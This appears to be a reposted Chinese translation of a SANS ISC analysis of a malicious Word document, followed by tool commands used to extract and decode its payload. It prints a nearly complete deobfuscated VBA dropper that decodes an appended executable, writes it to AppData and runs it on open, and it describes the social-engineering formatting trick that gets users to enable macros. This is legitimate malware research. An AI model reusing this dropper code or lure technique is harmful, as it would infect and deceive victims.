转载

分析报告:嵌入恶意payload的Word文档

一周前,SANS ISC管理和自由安全顾问Xavier Mertens先生分析了一篇恶意word文档,下面是他对此给出的分析报告。

事件背景介绍

上星期,我忙于研究某个安全事件里出现的一份有趣的恶意word文档。在当今社会中,存在着恶意宏的OLE文档并不新鲜,我每天都会在电子邮箱里收到不少这样的玩意儿。在他们发现更好的办法攻陷终端用户的电脑之前,这样的攻击都会一直持续下去。通常恶意宏需要用社工手段欺骗用户来执行,然后通过对象MSXML2.ServerXMLHTTP下载一个新的payload。

下面是一个构造混淆对象发起GET请求的例子:

BHJQWGDHJQWGDWQ = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & "TT" & "P" Set Tghafsdghqhjwgdhjqwgdjhqwgdqwd = CreateObject(BHJQWGDHJQWGDWQ) Tghafsdghqhjwgdhjqwgdjhqwgdqwd.Open "G" & "" & "ET", ggFw

其实这个事件的好坏,决定于你的所在的立场。这样的样本文件,其实有助于我们研究人员收集IOC的IP地址、URL、域名、以及文件名。当然,解密混淆的恶意宏和收集IOC是非常容易的。

在我研究的那个恶意事件中,word文档里的恶意宏并没有产生任何网络流量,payload从开始就被放置在word文档的结尾。该文档是在2015年9月生成的,在三天前VT得分只有2/43,我是第一个提交它的人。而该word文档的内容格式非常严整,其中含有能勾引受害人上当的内容。这里不得不提下,我使用了Didier Stevens的工具箱分析了这个恶意文档。

恶意文件分析报告

该文档由用户Helmut在2015年9月3日创建,里面包含了两个宏:

$ oledump.py malicious.doc  1:       121 '/x01CompObj'  2:      4096 '/x05DocumentSummaryInformation'  3:      4096 '/x05SummaryInformation'  4:     23860 '1Table'  5:    781575 'Data'  6:       486 'Macros/PROJECT'  7:        71 'Macros/PROJECTwm'  8: m     940 'Macros/VBA/ThisDocument'  9:      3256 'Macros/VBA/_VBA_PROJECT' 10:       569 'Macros/VBA/dir' 11: M    6052 'Macros/VBA/islamabad' 12:    257675 'WordDocument'

其中一个有趣的宏在上面的第11行代码,也就是名为islamabad(伊斯兰堡,巴基斯坦的首都)的地方。这是一个经典的混淆过的宏,可以通过下面这条命令提取:

$ oledump.py -s 11 -v malicious.doc

注意:我在宏代码里做了些修改,并对混淆过的代码进行解密,以便读者更好得阅读。

这个恶意payload(PE文件),与附加的数据(payload大小和校验和)一起放置在word文档末尾,我们一起来看看代码:

Attribute VB_Name = "islamabad" Public var_Filename1 As String Public var_Path1 As String

第一个函数提取了附加数据流的校验和:

Function func_Checksum(var_Data() As Byte, var_Len As Long) As Byte     For I = 0 To var_Len - 1         func_Checksum = func_Checksum Xor var_Data(I)     Next I End Function

下面的函数,会把二进制数据流进行XOR,然后在下一个函数中将其解密: 

Function func_DecodeBinary(var_Data() As Byte, var_Len As Long) As Boolean  Dim var_IV1 As Byte  var_IV1 = 11  For I = 0 To var_Len - 1   var_Data(I) = var_Data(I) Xor var_IV1   var_IV1 = ((var_IV1 Xor 13) Xor (I Mod 256))  Next I  func_DecodeBinary = True End Function

这个 VBA函数 改变了文档的布局,但我不太明白是啥原因: 

Function func_FormatDocument() As Boolean  ActiveDocument.GrammarChecked = False  ActiveDocument.SpellingChecked = False  ActiveDocument.Select  Selection.Font.ColorIndex = wdBlack  Selection.Font.Underline = wdUnderlineNone  Selection.HomeKey  For Each sec In ActiveDocument.Sections   For Each head In sec.Headers    head.Range.Delete   Next  Next  ViewDocument = True End Function Sub AutoClose() ActiveDocument.Save End Sub

在文档打开时,主要的宏会自动执行:

Sub AutoOpen()  On Error GoTo ErrorCondition1  Dim var_Dummy1 As Boolean  var_Dummy1 = func_FormatDocument()  Dim fh_File1  Dim var_Filesize As Long  Dim var_BinarySize As Long Dim var_Checksum As Byte

我们来获取文件大小,打开它并提取校验和(EOF -4),以及二进制数据流大小(EOF -3):

    var_Filesize = FileLen(ActiveDocument.FullName)     fh_File1 = FreeFile     Open (ActiveDocument.FullName) For Binary As #fh_File1     Get #fh_File1, (var_Filesize - 4), var_Checksum     Get #fh_File1, (var_Filesize - 3), var_BinarySize       If var_BinarySize < 8 Then         GoTo ErrorCondition1     End If       If (var_BinarySize + 4) > var_Filesize Then         GoTo ErrorCondition1 End If

下面的脚本计算了数据流的起始位置,并预估出一个合适大小的字节数组:

    Dim var_Offset As Long     var_Offset = var_Filesize - (var_BinarySize + 4)     Dim var_BinaryData1() As Byte ReDim var_BinaryData1(var_BinarySize - 1)

接着,提取出了二进制的恶意文件,然后解密:

    Get #fh_File1, var_Offset, var_BinaryData1     Close #fh_File1     If Not func_DecodeBinary(var_BinaryData1(), var_BinarySize) Then         GoTo ErrorCondition1 End If

对比校验和:

    Dim var_Dummy2 As Byte     var_Dummy2 = func_Checksum(var_BinaryData1(), var_BinarySize)     If var_Checksum <> var_Dummy2 Then         GoTo ErrorCondition1 End If

释放出的payload,其默认路径被混淆了(真实值为appdata/Microsoft/Word):

var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97)) & Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & Chr(102) & Chr(116) & Chr(92) & Chr(87) & Chr(111) & Chr(114) & Chr(100)

Scripting.FileSystemObject对象也被混淆了:

Set var_Object1 = CreateObject("Scripting" & Chr(46) & Chr(70) & Chr(105) & Chr(108) & Chr(101) & Chr(83) & Chr(121) & Chr(115) & Chr(116) & Chr(101) & Chr(109) & Chr(79) & Chr(98) & Chr(106) & Chr(101) & Chr(99) & Chr(116))

当然,为了防止默认路径不存在(非本例),脚本会使用另一个备用的路径(appdata)。

    If Not var_Object1.FolderExists(var_Path1) Then         var_Path1 = Environ(Chr(97) & Chr(112) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(97))     End If       Set var_Object1 = Nothing     Dim fh_File2 fh_File2 = FreeFile

释放出的payload文件名也被混淆了(真实名为:wfletxavb.exe):

注意:我不知道这里的文件名,为啥不是常见的动态随机生成的。那样其实可以避免文件系统对于恶意二进制流的检测。

    var_Filename1 = var_Path1 & "/" & Chr(119) & Chr(102) & Chr(108) & Chr(101) & Chr(116) & Chr(120) & Chr(97) & Chr(118) & Chr(98) & Chr(46) & Chr(101) & Chr(120) & Chr(101)     Open (var_Filename1) For Binary As #fh_File2     Put #fh_File2, 1, var_BinaryData1     Close #fh_File2 Erase var_BinaryData1

现在我们要执行啦:

 Set var_Object2 = CreateObject("WScript.Shell")  var_Object2.Exec var_Filename1  Exit Sub ErrorCondition1:  Close #fh_File1  Close #fh_File2  ActiveDocument.Save End Sub

通过逆向宏,我们可以猜测二进制流的起始位置,然后通过Didier的cut-bytes.py脚本工具进行提取。我们需要跳过文档的末尾字节,包括payload大小和校验和。

注意:Didier在他的工具里加了一个新的特性,这可以帮助我们提取数据:那就是可以指定忽略文件末尾的字节(详见下面的“-5”处的指令代码):

$ cut-bytes.py "<position>:-5" malicious.doc >binary.data $ file binary.data binary.data: data

宏里的解码函数,我们可以借用它来为translate.py脚本工具写一个专用解码器:

def FileDecode(input):  output = ''  code = 11  for iIter in range(len(input)):   output += chr(ord(input[iIter]) ^ code)   code = (code ^ 13) ^ (iIter % 256) return output

最后,我们可以解码二进制流,获得一个PE文件:

$ cat binary.data | translate.py -f -s decoder_caseXXXX.py -o binary.exe FileDecode $ file binary.exe binary.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

我并没有把这个PE样本文件报送到VirusTotal,但它很明显是一个恶意文件。

该文件由OLE文档、PE文件、校验和、PE文件长度构成,黑客借助它能快速生成一个新的加密PE文件,然后加进相同的word文档里。我很抱歉在这里不能分享样本,因为这次的分析研究还没有结束。

事件后记

上文中提到的Didier Steven先生,对本文做了一个后续补充。他表示在上文的分析中,Xavier提到了一个未知的VBA函数,他称之为func_FormatDocument。这个函数会改变文档的布局,在这里Didier分析了该函数的功能。

这个函数其实是社工技巧的一部分,在正常情况下,Microsoft Office宏在email附件里是默认禁用了的。如果黑客欺骗不了用户启用宏,本次攻击就会失败。

所以呢,黑客会用一个老掉牙的小手段,欺骗用户启用宏。其实就是设法让用户相信,文档里包含机密或者秘密的信息,然后用户自己需要启用宏才能查看。该word文档可能会包含隐藏、编码、加密的内容,用户需要去做点什么来揭开它神秘的面纱。这段VBA函数func_FormatDocument,就是这样一个复杂社工技巧的一部分。这个函数在用户选择启用宏后,会将字体颜色从白色到黑色,从而“解密”隐藏的内容,并去除让用户查看“真实内容”的指令提示。黑客就用这种弱智的手法欺骗用户,通过偷梁换柱的法子,启用了VBA宏并执行了恶意payload。

下面是视频,我相信大家看了视频,会比在这儿看我喷半天口水效果要好得多:

*参考来源: ISC ISC2 NS ,FB小编dawner编译,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 springcloud-demo Hive教程 Ant教程 ANTLR教程 SpringCloud java实例教程 XStream教程 Hazelcast教程 Elastic-Job-Lite 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 solr教程 Hadoop教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 java-demo Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 如何将Spring Cloud Task发布Data Flow上执行?
  2. 2 Spring Cloud Data Flow快速入门Demo
  3. 3 Spring Cloud Consul实现选举机制
  4. 4 Spring Boot集成ShedLock实现分布式定时任务
  5. 5 利用oss进行数据库和网站图片备份
  6. 6 Spring Cloud Stream实现数据流处理
  7. 7 Python3访问MySQL数据库快速入门Demo
  8. 8 Github开源项目作者可以免费申请 JetBrains 全家桶
  9. 9 Spring Cloud Vault快速入门Demo
  10. 10 Spring Cloud Gateway快速入门Demo
网站信息
  • 文章总数:82,716 篇
  • 文件总数:284,297 个
  • 标签总数:2,396 个
  • 分类总数:85 个
  • 留言数量:2,560 条
  • 在线人数:674 人
  • 运行天数:4,410天
  • 最后更新:2024年11月23日17点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG